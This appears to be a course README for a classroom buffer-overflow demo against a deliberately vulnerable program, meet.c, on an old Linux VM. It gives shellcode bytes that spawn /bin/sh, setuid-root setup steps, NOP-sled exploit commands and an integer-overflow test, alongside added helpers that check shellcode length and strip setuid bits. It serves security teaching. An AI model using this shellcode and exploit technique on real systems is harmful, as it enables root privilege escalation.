
vulnerability-demo

Prerequisites

These in-class demonstrations are designed to work inside a virtual machine running an (ancient) version of Linux. We provide basic VM images for either Oracle VirtualBox or VMware. CSL Linux machines all have VirtualBox pre-installed.

VM images

VirtualBox

vmware

Image: http://pages.cs.wisc.edu/~ace/assets/vmware-boxes-2.1.tar.bz2

Tips for these VM images

  • The user account username/password: user/user
  • The root account username/password: root/root

SSH access

Sometimes accessing the VM via SSH is easier (copy-paste may work better, and you can transfer files both ways using the scp command). Start up the VM, log in as user or root, and find the local IP address using the command:

 /sbin/ifconfig

Find the inet address assigned to this VM.

inet addr:172.16.250.140

Connect via SSH:

Copy files TO the VM:

scp demo/* user@172.16.250.140:~/

Copy files FROM the VM:

scp user@172.16.250.140:~/* demo/

Resources

This meet.c exploit demo is taken from Chapter 11 of the Ethical Hacker's Handbook (http://www.pdf-archive.com/2011/02/23/gray-hat-hacking/gray-hat-hacking.pdf). See this document if you get stuck and need more information.

Test and crash meet

Build our source

On the VM, after you've copied these source files, compile the source code.

gcc -o meet meet.c
gcc -o get_sp get_sp.c

Test and break meet

./meet Ace H@x0r
perl -e 'print "A"x200'
echo $(perl -e 'print "A"x200')
./meet Ace $(perl -e 'print "A"x200')
./meet Ace $(perl -e 'print "A"x500')

Control-flow hijack for meet.c

Setup setuid super-meet

Make a copy of meet and mark setuid (remember root password is root).

su root
cp meet super-meet
chown root:root super-meet
chmod u+s super-meet
exit

Generate shellcode

Be careful copy-pasting this command. Copy-pasting might introduce unintended line break characters.

perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > shellcode

Check the length: shellcode should be exactly 53 bytes. If not, something is wrong. Maybe you accidentally added an unintended line break or some other character.

wc -c shellcode

Get the stack pointer

./get_sp

Check it twice! It shouldn't change.

./get_sp

Compute an approximate landing spot: ESP - 0x300

(In the lines below, substitute your own ESP values.)

Stack pointer (ESP): 0xbffff672 - 0x300 = 0xbffff372

Convert to little-endian: 0x72 0xf3 0xff 0xbf. Use perl to print these 38 times:

perl -e 'print"\x72\xf3\xff\xbf"x38' > sp-repeat
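The two hand checks above (53-byte shellcode with no stray newline; ESP - 0x300 written out as little-endian byte escapes) are easy to get wrong when typed by hand. The POSIX shell functions below carry them out mechanically. This is an added example, not code from the vulnerability-demo repository; the function names and the sample files in the comments are this example's own.

```sh
#!/bin/sh
# Added helper script, not part of the vulnerability-demo repository.
# Names (check_shellcode, landing_spot, little_endian) are this example's own.

# check_shellcode FILE: succeed only if FILE is exactly 53 bytes and contains
# no newline (a stray line break from copy-paste is the failure the text warns about).
check_shellcode() {
    len=$(( $(wc -c < "$1") ))                    # arithmetic expansion strips wc's padding
    newlines=$(( $(tr -cd '\n' < "$1" | wc -c) )) # count of 0x0a bytes in the file
    if [ "$len" -eq 53 ] && [ "$newlines" -eq 0 ]; then
        return 0
    fi
    echo "shellcode: expected 53 bytes and no newline, got $len bytes, $newlines newline(s)" >&2
    return 1
}

# landing_spot ESP: print ESP - 0x300 as 0x-prefixed hex (the demo's approximate target).
landing_spot() {
    printf '0x%08x\n' $(( $1 - 0x300 ))
}

# little_endian ADDR: print the four address bytes, lowest byte first, as \xNN
# escapes ready to paste into the perl command that writes sp-repeat.
little_endian() {
    addr=$(( $1 ))
    printf '\\x%02x\\x%02x\\x%02x\\x%02x\n' \
        $(( addr & 0xff ))         $(( (addr >> 8) & 0xff )) \
        $(( (addr >> 16) & 0xff )) $(( (addr >> 24) & 0xff ))
}

# Worked run with the ESP value quoted in the text:
#   landing_spot 0xbffff672                      -> 0xbffff372
#   little_endian "$(landing_spot 0xbffff672)"   -> \x72\xf3\xff\xbf
#   check_shellcode shellcode && echo "shellcode looks right"
```

Run `check_shellcode shellcode` right after the perl command that creates the file; it reports both the byte count and the newline count, so a copy-paste accident shows up immediately instead of as an unexplained segfault later.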

Running the exploit

Run the exploit. Keep changing the size of the nop sled until you align the exploit properly on the stack. Try 200, 201, 202, ....

./meet ace $(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)

Check super-meet; it should be marked setuid:

ls -l

Check your id; it should be user (uid 1000):

id

Run the exploit against super-meet. If you get a shell, check your uid using id.

./super-meet ace "$(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)"
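The setuid-root copy created in the "Setup setuid super-meet" step is exactly the kind of file that should not be left lying around on a shared machine once the class is over. The POSIX shell functions below find setuid files under a directory and strip the bit again; they are an added example, not code from the vulnerability-demo repository, and the function names are this example's own.

```sh
#!/bin/sh
# Added cleanup/detection helpers, not part of the vulnerability-demo repository.
# Function names (list_setuid, strip_setuid, running_unprivileged) are this example's own.

# list_setuid DIR: print every regular file under DIR that has the setuid bit
# set (mode bit 4000), one path per line, sorted so the output is stable.
list_setuid() {
    find "$1" -type f -perm -4000 | sort
}

# strip_setuid DIR: clear the setuid bit on every such file, then print what
# is still setuid (should be nothing). chown back to the user is not needed
# to neutralise the file: without the bit, ownership by root gives no privilege.
strip_setuid() {
    find "$1" -type f -perm -4000 -exec chmod u-s {} +
    list_setuid "$1"
}

# running_unprivileged: succeed when the current shell is not uid 0, which is
# the state the text expects ("should be user(1000)") before running the demo.
running_unprivileged() {
    [ "$(id -u)" -ne 0 ]
}

# Typical use in the demo directory:
#   list_setuid .        -> ./super-meet   (while the demo is set up)
#   strip_setuid .       -> (no output once the bit has been removed)
```

`list_setuid /` run as root is the same check a system audit performs across the whole filesystem; comparing its output with a known-good list from a clean install is the simplest way to spot a setuid binary that does not belong there.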

Test integer overflow vulnerability

gcc -o width width.c
./width 5 "Hello there"
./width 85 "Hello there"
./width 65536 "Hello there"

Issues

If you find any problems with this demo: send me an email, file an issue, or better yet, just send me a pull request.
